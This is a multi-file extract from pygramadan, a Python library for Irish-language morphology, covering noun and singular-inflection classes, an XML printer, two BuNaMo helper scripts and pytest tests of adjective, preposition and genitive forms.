sgen = 'sgGen: [' + '] ['.join([f.value for f in self.sg_gen]) + '] \n'
svoc = 'sgVoc: [' + '] ['.join([f.value for f in self.sg_voc]) + '] \n'
sdat = 'sgDat: [' + '] ['.join([f.value for f in self.sg_dat]) + '] \n'
pnom = 'plNom: [' + '] ['.join([f.value for f in self.pl_nom]) + '] \n'
pgen = 'plGen: [' + '] ['.join([f.value for f in self.pl_gen]) + '] \n'
pvoc = 'plVoc: [' + '] ['.join([f.value for f in self.pl_voc]) + '] \n'
return snom + sgen + svoc + sdat + pnom + pgen + pvoc
def __init__(self,
source = None,
definite: bool = False,
proper: bool = False,
immutable: bool = False,
article_genitive: bool = False,
disambig: str = "",
declension: int = 0,
sg_nom: List[FormSg] = None,
sg_gen: List[FormSg] = None,
sg_voc: List[FormSg] = None,
sg_dat: List[FormSg] = None,
pl_nom: List[Form] = None,
pl_gen: List[FormPlGen] = None,
pl_voc: List[Form] = None,
count: List[Form] = None) -> None:
self.is_definite: bool = definite
self.is_proper: bool = proper
self.is_immutable: bool = immutable
self.article_genitive: bool = article_genitive
# Keep track of generated "dative"
self.artificial_dative = True
self.disambig: str = disambig
self.declension: int = declension
self.sg_nom: list[FormSg] = sg_nom
self.sg_gen: list[FormSg] = sg_gen
self.sg_voc: list[FormSg] = sg_voc
self.sg_dat: list[FormSg] = sg_dat
self.pl_nom: list[Form] = pl_nom
self.pl_gen: list[FormPlGen] = pl_gen
self.pl_voc: list[Form] = pl_voc
self.count: list[Form] = count
if self.sg_nom is None:
self.sg_nom = []
if self.sg_gen is None:
self.sg_gen = []
if self.sg_voc is None:
self.sg_voc = []
if self.sg_dat is None:
self.sg_dat = []
if self.pl_nom is None:
self.pl_nom = []
if self.pl_gen is None:
self.pl_gen = []
if self.pl_voc is None:
self.pl_voc = []
if self.count is None:
self.count = []
if source is not None:
self._empty()
self.from_xml(source)
self.add_dative()
def _empty(self):
"""Clear the current contents"""
self.is_definite = False
self.is_proper = False
self.is_immutable = False
self.article_genitive = False
self.disambig = ""
self.declension = 0
self.sg_nom = []
self.sg_gen = []
self.sg_voc = []
self.sg_dat = []
self.pl_nom = []
self.pl_gen = []
self.pl_voc = []
self.count = []
def get_lemma(self) -> str:
lemma_form = self.sg_nom[0]
if lemma_form:
return lemma_form.value
else:
return ""
def get_identifier(self) -> str:
"""
Get an identifier for this noun
Note: called getNickname() in Gramadán
"""
gender = "fem" if self.get_gender() == Gender.Fem else "masc"
disambig = ""
if self.disambig != "":
disambig = "_" + self.disambig
outlem = self.get_lemma().replace(" ", "_")
return f'{outlem}_{gender}_{self.declension}{disambig}'
def get_gender(self) -> Gender:
return self.sg_nom[0].gender
def add_dative(self) -> None:
if len(self.sg_dat) == 0:
for form in self.sg_nom:
self.sg_dat.append(FormSg(form.value, form.gender))
self.artificial_dative = True
def to_xml(self):
props = {}
props['default'] = self.get_lemma()
props['declension'] = str(self.declension)
props['disambig'] = self.disambig
props['isProper'] = '1' if self.is_proper else '0'
props['isDefinite'] = '1' if self.is_definite else '0'
props['isImmutable'] = '1' if self.is_immutable else '0'
props['allowArticledGenitive'] = '1' if self.article_genitive else '0'
root = ET.Element('noun', props)
write_sg(self.sg_nom, 'sgNom', root)
write_sg(self.sg_gen, 'sgGen', root)
if not self.artificial_dative:
write_sg(self.sg_dat, 'sgDat', root)
write_sg(self.sg_voc, 'sgVoc', root)
write_pl(self.pl_nom, 'plNom', root)
write_pl_gen(self.pl_gen, 'plGen', root)
write_pl(self.pl_voc, 'plVoc', root)
write_pl(self.count, 'count', root)
return ET.tostring(root, encoding='UTF-8')
def from_xml(self, source) -> None:
"""
Initialise from XML in BuNaMo format:
>>> from pygramadan.noun import Noun
>>> import io
>>> xml = \"\"\"<noun default="ainm" declension="4" disambig="" isProper="0" isDefinite="0" allowArticledGenitive="0">
... <sgNom default="ainm" gender="masc" />
... <sgGen default="ainm" gender="masc" />
... <plNom default="ainmneacha" />
... <plGen default="ainmneacha" strength="strong" />
... </noun>\"\"\"
>>> sio = io.StringIO(xml)
>>> ainm = Noun(source=sio)
"""
tree = ET.parse(source)
root = tree.getroot()
self.is_definite = True if root.attrib['isDefinite'] == '1' else False
self.is_proper = True if root.attrib['isProper'] == '1' else False
if 'isImmutable' in root.attrib and root.attrib['isImmutable'] == '1':
self.is_immutable = True
else:
self.is_immutable = False
if 'allowArticledGenitive' in root.attrib and root.attrib['allowArticledGenitive'] == '1':
self.article_genitive = True
else:
self.article_genitive = False
self.disambig = root.attrib['disambig']
self.declension = int(root.attrib['declension'])
formsg_node(root, './sgNom', self.sg_nom)
formsg_node(root, './sgGen', self.sg_gen)
formsg_node(root, './sgVoc', self.sg_voc)
formsg_node(root, './sgDat', self.sg_dat)
if len(self.sg_dat) != 0:
self.artificial_dative = False
formpl_node(root, './plNom', self.pl_nom)
formplgen_node(root, './plGen', self.pl_gen)
formpl_node(root, './plVoc', self.pl_voc)
formpl_node(root, './count', self.count)
def get_all_forms(self, fake_dative = False):
"""
Returns a list of tuples, `(part-of-speech, form)`:
>>> ainm.get_all_forms()
[('sg_nom', 'ainm'), ('pl_gen', 'ainmneacha'), ('sg_gen', 'ainm'), ('pl_nom', 'ainmneacha')]
If `fake_dative` is false, generated "dative" (usually nominative) forms are omitted
"""
forms = set()
for nom_sg in self.sg_nom:
tpl = ('sg_nom', nom_sg.value)
forms.add(tpl)
for gen_sg in self.sg_gen:
tpl = ('sg_gen', gen_sg.value)
forms.add(tpl)
for voc_sg in self.sg_voc:
tpl = ('sg_voc', voc_sg.value)
forms.add(tpl)
for dat_sg in self.sg_dat:
if not self.artificial_dative or fake_dative:
tpl = ('sg_dat', dat_sg.value)
forms.add(tpl)
for nom_pl in self.pl_nom:
tpl = ('pl_nom', nom_pl.value)
forms.add(tpl)
for gen_pl in self.pl_gen:
tpl = ('pl_gen', gen_pl.value)
forms.add(tpl)
for voc_pl in self.pl_voc:
tpl = ('pl_voc', voc_pl.value)
forms.add(tpl)
for count in self.count:
tpl = ('count', count.value)
forms.add(tpl)
return list(forms)
def get_unique_forms(self):
"""
Returns a list of unique word forms:
>>> ainm.get_unique_forms()
['ainm', 'ainmneacha']
"""
return list(set([a[1] for a in self.get_all_forms()]))
```
#### File: pygramadan/pygramadan/printer_neid.py
```python
from .mutation import starts_vowel
from .opers import mutate
from .attributes import Mutation, VPTense, VPPerson
from .attributes import VPShape, VPPolarity, VPMood
from .adjective import Adjective
from .noun import Noun
from .noun_phrase import NP
from .prepositional_phrase import PP
from .preposition import Preposition
from .verb import Verb
from .verb_phrase import VP
from typing import List
import xml.etree.ElementTree as ET
DCL = ET.PI('xml', "version='1.0' encoding='utf-8'")
XSL = ET.PI('xml-stylesheet', "type='text/xsl' href='!gram.xsl'")
NL = bytes('\n', encoding='UTF-8')
class PrinterNeid:
def __init__(self, with_xml_declarations = True) -> None:
self.with_xml_declarations = with_xml_declarations
def print_noun_xml(self, n: Noun) -> str:
np = NP(n)
props = {}
props['lemma'] = n.get_lemma()
props['uid'] = n.get_identifier()
root = ET.Element('Lemma', props)
nprops = {}
nprops['gender'] = n.get_gender().name.lower()
nprops['declension'] = str(n.declension)
ntag = ET.SubElement(root, 'noun', nprops)
def _do_element(noun_tag, lista, listb, name):
for sng in zip(lista, listb):
grouptag = ET.SubElement(noun_tag, name)
artn = ET.SubElement(grouptag, 'articleNo')
artn.text = sng[0].value
arty = ET.SubElement(grouptag, 'articleYes')
arty.text = sng[1].value
_do_element(ntag, np.sg_nom, np.sg_nom_art, 'sgNom')
_do_element(ntag, np.sg_gen, np.sg_gen_art, 'sgGen')
_do_element(ntag, np.pl_nom, np.pl_nom_art, 'plNom')
_do_element(ntag, np.pl_gen, np.pl_gen_art, 'plGen')
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
def print_np_xml(self, np: NP) -> str:
props = {}
props['lemma'] = np.get_lemma()
props['uid'] = np.get_identifier()
root = ET.Element('Lemma', props)
nprops = {}
nprops['gender'] = np.get_gender().name.lower()
nprops['forceNominative'] = '1' if np.force_nominative else '0'
ntag = ET.SubElement(root, 'nounPhrase', nprops)
def _do_element(noun_tag, lista, listb, name):
for sng in zip(lista, listb):
grouptag = ET.SubElement(noun_tag, name)
artn = ET.SubElement(grouptag, 'articleNo')
artn.text = sng[0].value
arty = ET.SubElement(grouptag, 'articleYes')
arty.text = sng[1].value
_do_element(ntag, np.sg_nom, np.sg_nom_art, 'sgNom')
_do_element(ntag, np.sg_gen, np.sg_gen_art, 'sgGen')
_do_element(ntag, np.pl_nom, np.pl_nom_art, 'plNom')
_do_element(ntag, np.pl_gen, np.pl_gen_art, 'plGen')
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
def print_adjective_xml(self, adj: Adjective) -> str:
props = {}
props['lemma'] = adj.get_lemma()
props['uid'] = adj.get_identifier()
root = ET.Element('Lemma', props)
aprops = {}
aprops['declension'] = str(adj.declension)
atag = ET.SubElement(root, 'adjective', aprops)
def _do_tags(root, list, name, mut):
for sub in list:
subtag = ET.SubElement(root, name)
subtag.text = mutate(mut, sub.value)
_do_tags(atag, adj.sg_nom, 'sgNomMasc', Mutation.NoMut)
_do_tags(atag, adj.sg_nom, 'sgNomFem', Mutation.Len1)
_do_tags(atag, adj.sg_gen_masc, 'sgGenMasc', Mutation.Len1)
_do_tags(atag, adj.sg_gen_fem, 'sgGenFem', Mutation.NoMut)
_do_tags(atag, adj.pl_nom, 'plNom', Mutation.NoMut)
_do_tags(atag, adj.pl_nom, 'plNomSlen', Mutation.Len1)
_do_tags(atag, adj.pl_nom, 'plGenStrong', Mutation.NoMut)
_do_tags(atag, adj.sg_nom, 'plGenWeak', Mutation.NoMut)
for form in adj.get_compar_pres():
subtag = ET.SubElement(atag, 'comparPres')
subtag.text = form.value
for form in adj.get_compar_past():
subtag = ET.SubElement(atag, 'comparPast')
subtag.text = form.value
for form in adj.get_super_pres():
subtag = ET.SubElement(atag, 'superPres')
subtag.text = form.value
for form in adj.get_super_past():
subtag = ET.SubElement(atag, 'superPast')
subtag.text = form.value
for form in adj.abstract:
subtag = ET.SubElement(atag, 'abstractNoun')
subtag.text = form.value
for form in adj.abstract:
subtag = ET.SubElement(atag, 'abstractNounExamples')
ssubtag1 = ET.SubElement(subtag, 'example')
ssubtag1.text = "dá " + mutate(Mutation.Len1, form.value)
ssubtag2 = ET.SubElement(subtag, 'example')
if starts_vowel(form.value):
ssubtag2.text = "ag dul in " + mutate(Mutation.NoMut, form.value)
else:
ssubtag2.text = "ag dul i " + mutate(Mutation.Ecl1, form.value)
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
def print_pp_xml(self, pp: PP) -> str:
props = {}
props['lemma'] = pp.get_lemma()
props['uid'] = pp.get_identifier()
root = ET.Element('Lemma', props)
ntag = ET.SubElement(root, 'prepositionalPhrase')
for sng in zip(pp.sg, pp.sg_art_n, pp.sg_art_s):
grouptag = ET.SubElement(ntag, 'sg')
artn = ET.SubElement(grouptag, 'articleNo')
artn.text = sng[0].value
if sng[1].value == sng[2].value:
arty = ET.SubElement(grouptag, 'articleYes')
arty.text = sng[1].value
else:
artyn = ET.SubElement(grouptag, 'articleYes', {'var': 'north'})
artyn.text = sng[1].value
artys = ET.SubElement(grouptag, 'articleYes', {'var': 'south'})
artys.text = sng[2].value
for plr in zip(pp.pl, pp.pl_art):
grouptag = ET.SubElement(ntag, 'pl')
artn = ET.SubElement(grouptag, 'articleNo')
artn.text = plr[0].value
arty = ET.SubElement(grouptag, 'articleYes')
arty.text = plr[1].value
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
def print_preposition_xml(self, prep: Preposition) -> str:
props = {}
props['lemma'] = prep.get_lemma()
props['uid'] = prep.get_identifier()
root = ET.Element('Lemma', props)
ptag = ET.SubElement(root, 'preposition')
for form in prep.sg1:
subtag = ET.SubElement(ptag, 'persSg1')
subtag.text = form.value
for form in prep.sg2:
subtag = ET.SubElement(ptag, 'persSg2')
subtag.text = form.value
for form in prep.sg3_masc:
subtag = ET.SubElement(ptag, 'persSg3Masc')
subtag.text = form.value
for form in prep.sg3_fem:
subtag = ET.SubElement(ptag, 'persSg3Fem')
subtag.text = form.value
for form in prep.pl1:
subtag = ET.SubElement(ptag, 'persPl1')
subtag.text = form.value
for form in prep.pl2:
subtag = ET.SubElement(ptag, 'persPl2')
subtag.text = form.value
for form in prep.pl3:
subtag = ET.SubElement(ptag, 'persPl3')
subtag.text = form.value
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
def print_verb_xml(self, v: Verb) -> str:
props = {}
props['lemma'] = v.get_lemma()
props['uid'] = v.get_identifier()
root = ET.Element('Lemma', props)
_TENSES = {
"past": VPTense.Past,
"present": VPTense.PresCont,
"future": VPTense.Fut,
"condi": VPTense.Cond,
"pastConti": VPTense.PastCont
}
if v.get_lemma() == 'bí':
_TENSES['present'] = VPTense.Pres
_TENSES['presentConti'] = VPTense.PresCont
_PERSON = {
"sg1": VPPerson.Sg1,
"sg2": VPPerson.Sg2,
"sg3Masc": VPPerson.Sg3Masc,
"sg3Fem": VPPerson.Sg3Fem,
"pl1": VPPerson.Pl1,
"pl2": VPPerson.Pl2,
"pl3": VPPerson.Pl3,
"auto": VPPerson.Auto
}
ptag = ET.SubElement(root, 'verb')
for form in v.verbal_noun:
subtag = ET.SubElement(ptag, 'vn')
subtag.text = form.value
for form in v.verbal_adj:
subtag = ET.SubElement(ptag, 'va')
subtag.text = form.value
vp = VP(v)
for tense in _TENSES.keys():
ttag = ET.SubElement(ptag, tense)
for pers in _PERSON.keys():
perstag = ET.SubElement(ttag, pers)
for form in vp.tenses[_TENSES[tense]][VPShape.Declar][_PERSON[pers]][VPPolarity.Pos]:
ftag = ET.SubElement(perstag, 'pos')
ftag.text = form.value
for form in vp.tenses[_TENSES[tense]][VPShape.Interrog][_PERSON[pers]][VPPolarity.Pos]:
ftag = ET.SubElement(perstag, 'quest')
ftag.text = form.value + '?'
for form in vp.tenses[_TENSES[tense]][VPShape.Declar][_PERSON[pers]][VPPolarity.Neg]:
ftag = ET.SubElement(perstag, 'neg')
ftag.text = form.value
_MOODS = {
"imper": VPMood.Imper,
"subj": VPMood.Subj
}
for mood in _MOODS:
mtag = ET.SubElement(ptag, mood)
for pers in _PERSON.keys():
perstag = ET.SubElement(mtag, pers)
for form in vp.moods[_MOODS[mood]][_PERSON[pers]][VPPolarity.Pos]:
if _MOODS[mood] == VPMood.Imper:
value = form.value + '!'
else:
value = form.value
ftag = ET.SubElement(perstag, 'pos')
ftag.text = value
for form in vp.moods[_MOODS[mood]][_PERSON[pers]][VPPolarity.Neg]:
if _MOODS[mood] == VPMood.Imper:
value = form.value + '!'
else:
value = form.value
ftag = ET.SubElement(perstag, 'neg')
ftag.text = value
out = ET.tostring(root, encoding='UTF-8')
if self.with_xml_declarations:
return ET.tostring(DCL) + NL + ET.tostring(XSL) + NL + out
else:
return out
```
#### File: pygramadan/pygramadan/singular_info.py
```python
from .attributes import Gender
from .forms import Form
from .opers import VOWELS, VOWELS_BROAD, VOWELS_SLENDER, broaden_target, slenderise_target, syncopate
from typing import List
import re
class SingularInfo():
def __init__(self,
gender: Gender = None,
nominative: List[Form] = None,
genitive: List[Form] = None,
vocative: List[Form] = None,
dative: List[Form] = None) -> None:
self.gender = gender
self.nominative = nominative
self.genitive = genitive
self.vocative = vocative
self.dative = dative
if self.nominative is None:
self.nominative = []
if self.genitive is None:
self.genitive = []
if self.vocative is None:
self.vocative = []
if self.dative is None:
self.dative = []
def __str__(self) -> str:
return self._gramadan_string()
def _gramadan_string(self) -> str:
nom = 'NOM: [' + '] ['.join([f.value for f in self.nominative]) + '] \n'
gen = 'GEN: [' + '] ['.join([f.value for f in self.genitive]) + '] \n'
voc = 'VOC: [' + '] ['.join([f.value for f in self.vocative]) + '] \n'
dat = 'DAT: [' + '] ['.join([f.value for f in self.dative]) + '] \n'
return nom + gen + voc + dat
class SingularInfoO(SingularInfo):
"""Singular class O: all cases are identical."""
def __init__(self, lemma: str = "", gender: Gender = None):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=[Form(lemma)],
vocative=[Form(lemma)],
dative=[Form(lemma)])
class SingularInfoC(SingularInfo):
"""Singular class C: genitive and vocative formed by slenderisation."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
slenderisation_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=None,
dative=[Form(lemma)])
form = re.sub('ch$', 'gh', lemma)
form = slenderise_target(form, slenderisation_target)
if gender == Gender.Fem:
self.vocative.append(Form(lemma))
form = re.sub("igh$", "í", form)
self.genitive.append(Form(form))
else:
self.vocative.append(Form(form))
self.genitive.append(Form(form))
class SingularInfoL(SingularInfo):
"""Singular class L: genitive formed by broadening."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
broadening_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = broaden_target(lemma, broadening_target)
self.genitive.append(Form(form))
class SingularInfoE(SingularInfo):
"""Singular class E: genitive formed by suffix "-e"."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
syncopation: bool = False,
double_dative: bool = False,
slenderisation_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=None)
form = lemma
if syncopation:
form = syncopate(form)
form = slenderise_target(form, slenderisation_target)
self.dative.append(Form(form))
if double_dative:
self.dative.append(Form(lemma))
form = re.sub(r"([" + VOWELS + "])ngt$", r"\1ngth", form)
form = re.sub(r'ú$', 'aith', form)
form += 'e'
self.genitive.append(Form(form))
class SingularInfoA(SingularInfo):
"""Singular class A: genitive formed by suffix "-a"."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
syncopation: bool = False,
broadening_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = lemma
form = re.sub(r"([" + VOWELS_SLENDER + "])rt$", r"\1rth", form)
form = re.sub(r"([" + VOWELS_SLENDER + "])(nn?)t$", r"\1\2", form)
if syncopation:
form = syncopate(form)
form = broaden_target(form, broadening_target)
form += 'a'
self.genitive.append(Form(form))
class SingularInfoD(SingularInfo):
"""Singular class D: genitive ends in "-d"."""
def __init__(self,
lemma: str = "",
gender: Gender = None):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = lemma
form = re.sub(r"([" + VOWELS_BROAD + "])$", r"\1d", form)
form = re.sub(r"([" + VOWELS_SLENDER + "])$", r"\1ad", form)
self.genitive.append(Form(form))
class SingularInfoN(SingularInfo):
"""Singular class N: genitive ends in "-n"."""
def __init__(self,
lemma: str = "",
gender: Gender = None):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = lemma
form = re.sub(r"([" + VOWELS_BROAD + "])$", r"\1n", form)
form = re.sub(r"([" + VOWELS_SLENDER + "])$", r"\1an", form)
self.genitive.append(Form(form))
class SingularInfoEAX(SingularInfo):
"""Singular class EAX: genitive ends in "-each"."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
syncopation: bool = False,
slenderisation_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = lemma
if syncopation:
form = syncopate(lemma)
form = slenderise_target(form, slenderisation_target)
form += 'each'
self.genitive.append(Form(form))
class SingularInfoAX(SingularInfo):
"""Singular class AX: genitive ends in "-ach"."""
def __init__(self,
lemma: str = "",
gender: Gender = None,
syncopation: bool = False,
broadening_target: str = ""):
super().__init__(gender=gender,
nominative=[Form(lemma)],
genitive=None,
vocative=[Form(lemma)],
dative=[Form(lemma)])
form = lemma
if syncopation:
form = syncopate(lemma)
form = broaden_target(form, broadening_target)
form += 'ach'
self.genitive.append(Form(form))
```
#### File: pygramadan/scripts/generate_connacht_plurals.py
```python
import argparse
from pygramadan.noun import Noun
from pathlib import Path
import sys
"""
Connacht plurals for -acha/-anna are -achaí/-annaí
(derived from the old dative plurals -achaibh/-annaibh)
Even if these forms are to be included in the pronunciation
lexicon as variants, these forms are easier to generate
with G2P as they map to the correct vowel.
"""
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--bunamo", type=str, help="path to BuNaMo")
args = parser.parse_args()
if args.bunamo is None:
sys.exit('--bunamo option not set')
bunamo = Path(args.bunamo)
if not bunamo.is_dir():
sys.exit(f'path "{args.bunamo}" is not a directory')
noun_dir = bunamo / 'noun'
if not noun_dir.is_dir():
sys.exit(f'"{args.bunamo}" does not contain noun/ directory')
for noun_file in noun_dir.glob('*.xml'):
n = Noun(source=noun_file)
if len(n.pl_nom) > 0 and len(n.pl_gen) > 0 and n.pl_nom[0].value == n.pl_gen[0].value:
for form in n.pl_nom:
if form.value.endswith('acha') or form.value.endswith('anna'):
print(f'{form.value}\t{form.value}í')
if __name__ == "__main__":
main()
```
#### File: pygramadan/scripts/test_possessives.py
```python
import argparse
from pygramadan.noun import Noun
from pygramadan.possessive import Possessive
from pygramadan.noun_phrase import NP
from pathlib import Path
import sys
_NOUNS = [
"árasán_masc1.xml",
"bó_fem.xml",
"comhlacht_masc3.xml",
"dealbh_fem2.xml",
"éiceachóras_masc1.xml",
"francfurtar_masc1.xml",
"fliúit_fem2.xml",
"fadhb_fem2.xml",
"fobhríste_masc4.xml",
"garáiste_masc4.xml",
"haematóma_masc4.xml",
"iasacht_fem3.xml",
"jab_masc4.xml",
"leabharlann_fem2.xml",
"máthair_fem5.xml",
"nóta_masc4.xml",
"ócáid_fem2.xml",
"pacáiste_masc4.xml",
"rás_masc3.xml",
"sobaldráma_masc4.xml",
"sábh_masc1.xml",
"stábla_masc4.xml",
"sráid_fem2.xml",
"tábhairne_masc4.xml",
"ubh_fem2.xml",
"x-gha_masc4.xml",
"zombaí_masc4.xml"
]
_POSS = [
"mo_poss.xml",
"do_poss.xml",
"a_poss_masc.xml",
"a_poss_fem.xml",
"ár_poss.xml",
"bhur_poss.xml",
"a_poss_pl.xml"
]
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--bunamo", type=str, help="path to BuNaMo")
args = parser.parse_args()
if args.bunamo is None:
sys.exit('--bunamo option not set')
bunamo = Path(args.bunamo)
if not bunamo.is_dir():
sys.exit(f'path "{args.bunamo}" is not a directory')
noun_dir = bunamo / 'noun'
if not noun_dir.is_dir():
sys.exit(f'"{args.bunamo}" does not contain noun/ directory')
poss_dir = bunamo / 'possessive'
if not poss_dir.is_dir():
sys.exit(f'"{args.bunamo}" does not contain possessive/ directory')
noun_files = [noun_dir / x for x in _NOUNS]
poss_files = [poss_dir / x for x in _POSS]
nouns = [Noun(source=f) for f in noun_files]
poss = [Possessive(source=f) for f in poss_files]
for noun in nouns:
for p in poss:
np = NP(noun=noun, possessive=p)
print(f'{p.get_identifier()}\t{np.sg_nom[0].value}\t{np.sg_gen[0].value}\t{np.pl_nom[0].value}\t{np.pl_gen[0].value}')
if __name__ == "__main__":
main()
```
#### File: pygramadan/tests/test_adjective.py
```python
from pygramadan.adjective import Adjective, example_xml
from pygramadan.forms import Form
from lxml.doctestcompare import LXMLOutputChecker, PARSE_XML
import io
BEAG_XML = example_xml()
def test_create():
sg_nom = [Form("beag")]
sg_gen_masc = [Form("big")]
sg_gen_fem = [Form("bige")]
pl_nom = [Form("beaga")]
graded = [Form("lú")]
abstract = [Form("laghad")]
beag = Adjective(disambig="",
declension=1,
sg_nom=sg_nom,
sg_gen_masc=sg_gen_masc,
sg_gen_fem=sg_gen_fem,
pl_nom=pl_nom,
graded=graded,
abstract=abstract)
assert beag is not None
def make_beag():
sg_nom = [Form("beag")]
sg_gen_masc = [Form("big")]
sg_gen_fem = [Form("bige")]
pl_nom = [Form("beaga")]
graded = [Form("lú")]
abstract = [Form("laghad")]
beag = Adjective(disambig="",
declension=1,
sg_nom=sg_nom,
sg_gen_masc=sg_gen_masc,
sg_gen_fem=sg_gen_fem,
pl_nom=pl_nom,
graded=graded,
abstract=abstract)
return beag
def test_get_lemma():
beag = make_beag()
assert beag.get_lemma() == 'beag'
def test_read_xml():
sio = io.StringIO(BEAG_XML)
beag = Adjective(source=sio)
assert beag.get_lemma() == 'beag'
def test_to_xml():
beag = make_beag()
xml = beag.to_xml()
checker = LXMLOutputChecker()
assert checker.check_output(BEAG_XML, xml, PARSE_XML) is True
def test_get_indentifier():
beag = make_beag()
assert beag.get_identifier() == 'beag_adj1'
def test_get_compar_pres():
beag = make_beag()
assert beag.get_compar_pres()[0].value == 'níos lú'
def test_get_super_pres():
beag = make_beag()
assert beag.get_super_pres()[0].value == 'is lú'
def test_get_compar_past():
beag = make_beag()
assert beag.get_compar_past()[0].value == 'ní ba lú'
dummy1 = Adjective(graded=[Form("adha")])
assert dummy1.get_compar_past()[0].value == "ní b'adha"
dummy2 = Adjective(graded=[Form("fusa")])
assert dummy2.get_compar_past()[0].value == "ní b'fhusa"
def test_get_super_past():
beag = make_beag()
assert beag.get_super_past()[0].value == 'ba lú'
dummy1 = Adjective(graded=[Form("adha")])
assert dummy1.get_super_past()[0].value == "ab adha"
dummy2 = Adjective(graded=[Form("fusa")])
assert dummy2.get_super_past()[0].value == "ab fhusa"
def test_get_all_forms():
beag = make_beag()
beag_list = beag.get_all_forms(abstract=False)
assert len(beag_list) == 5
exp1 = [('sg_nom', 'beag'), ('sg_gen_masc', 'big'), ('sg_gen_fem', 'bige'), ('pl_nom', 'beaga'), ('graded', 'lú')]
beag_list.sort()
exp1.sort()
assert beag_list == exp1
beag_list2 = beag.get_all_forms()
assert len(beag_list2) == 6
exp2 = exp1 + [('abstract', 'laghad')]
beag_list2.sort()
exp2.sort()
assert beag_list2 == exp2
```
#### File: pygramadan/tests/test_preposition.py
```python
from pygramadan.preposition import Preposition, get_example
from pygramadan.forms import Form
from lxml.doctestcompare import LXMLOutputChecker, PARSE_XML
import io
LE_XML = get_example()
def test_create():
le = Preposition(lemma="le",
disambig="",
sg1=[Form("liom")],
sg2=[Form("leat")],
sg3_masc=[Form("leis")],
sg3_fem=[Form("léi")],
pl1=[Form("linn")],
pl2=[Form("libh")],
pl3=[Form("leo")])
assert le is not None
def make_le():
le = Preposition(lemma="le",
disambig="",
sg1=[Form("liom")],
sg2=[Form("leat")],
sg3_masc=[Form("leis")],
sg3_fem=[Form("léi")],
pl1=[Form("linn")],
pl2=[Form("libh")],
pl3=[Form("leo")])
return le
def test_getlemma():
le = make_le()
assert le.get_lemma() == 'le'
def test_to_xml():
le = make_le()
xml = le.to_xml()
checker = LXMLOutputChecker()
assert checker.check_output(LE_XML, xml, PARSE_XML) is True
def test_read_xml():
sio = io.StringIO(LE_XML)
le = Preposition(source=sio)
assert le.get_lemma() == 'le'
assert le.sg3_masc[0].value == "leis"
def make_in_aice_le():
in_aice_le = Preposition(lemma="in aice le",
disambig="")
return in_aice_le
def test_get_identifier():
le = make_le()
assert le.get_identifier() == 'le_prep'
in_aice_le = make_in_aice_le()
assert in_aice_le.get_identifier() == 'in_aice_le_prep'
def test_is_empty():
le = make_le()
assert le.is_empty() is False
in_aice_le = make_in_aice_le()
assert in_aice_le.is_empty() is True
def test_get_all_forms():
le = make_le()
le_list = le.get_all_forms()
assert len(le_list) == 7
exp = [('pl2', 'libh'), ('sg3_masc', 'leis'), ('sg1', 'linn'),
('pl3', 'leo'), ('sg2', 'leat'), ('sg1', 'liom'),
('sg3_fem', 'léi')]
le_list.sort()
exp.sort()
assert le_list == exp
```
#### File: pygramadan/tests/test_singular_info.py
```python
from pygramadan.singular_info import SingularInfo, SingularInfoO, SingularInfoA
from pygramadan.singular_info import SingularInfoAX, SingularInfoC, SingularInfoD
from pygramadan.singular_info import SingularInfoE
from pygramadan.attributes import Gender
from pygramadan.forms import Form
def test_singular_info():
si = SingularInfo(Gender.Fem,
nominative=[Form("bean")],
genitive=[Form("mná")],
vocative=[Form("bean")],
dative=[Form("mnaoi")])
assert si.nominative[0].value == 'bean'
to_s = "NOM: [bean] \nGEN: [mná] \nVOC: [bean] \nDAT: [mnaoi] \n"
assert si.__str__() == to_s
def test_singular_info_o():
si = SingularInfoO("test", Gender.Masc)
to_s = "NOM: [test] \nGEN: [test] \nVOC: [test] \nDAT: [test] \n"
assert si.__str__() == to_s
# This is where things start to happen
def test_singular_info_c():
si = SingularInfoC("marcach", Gender.Masc)
assert si.genitive[0].value == 'marcaigh'
assert si.vocative[0].value == 'marcaigh'
assert si.nominative[0].value == 'marcach'
assert si.dative[0].value == 'marcach'
si2 = SingularInfoC("cailleach", Gender.Fem)
assert si2.genitive[0].value == 'caillí'
assert si2.vocative[0].value == 'cailleach'
assert si2.nominative[0].value == 'cailleach'
assert si2.dative[0].value == 'cailleach'
def test_singular_info_e():
si = SingularInfoE("scrúdú", Gender.Masc)
assert si.genitive[0].value == 'scrúdaithe'
si = SingularInfoE("tarraingt", Gender.Fem)
assert si.genitive[0].value == 'tarraingthe'
def test_singular_info_a():
si = SingularInfoA("bagairt", Gender.Fem)
assert si.genitive[0].value == 'bagartha'
si = SingularInfoA("cionnroinnt", Gender.Fem, broadening_target="a")
assert si.genitive[0].value == 'cionnranna'
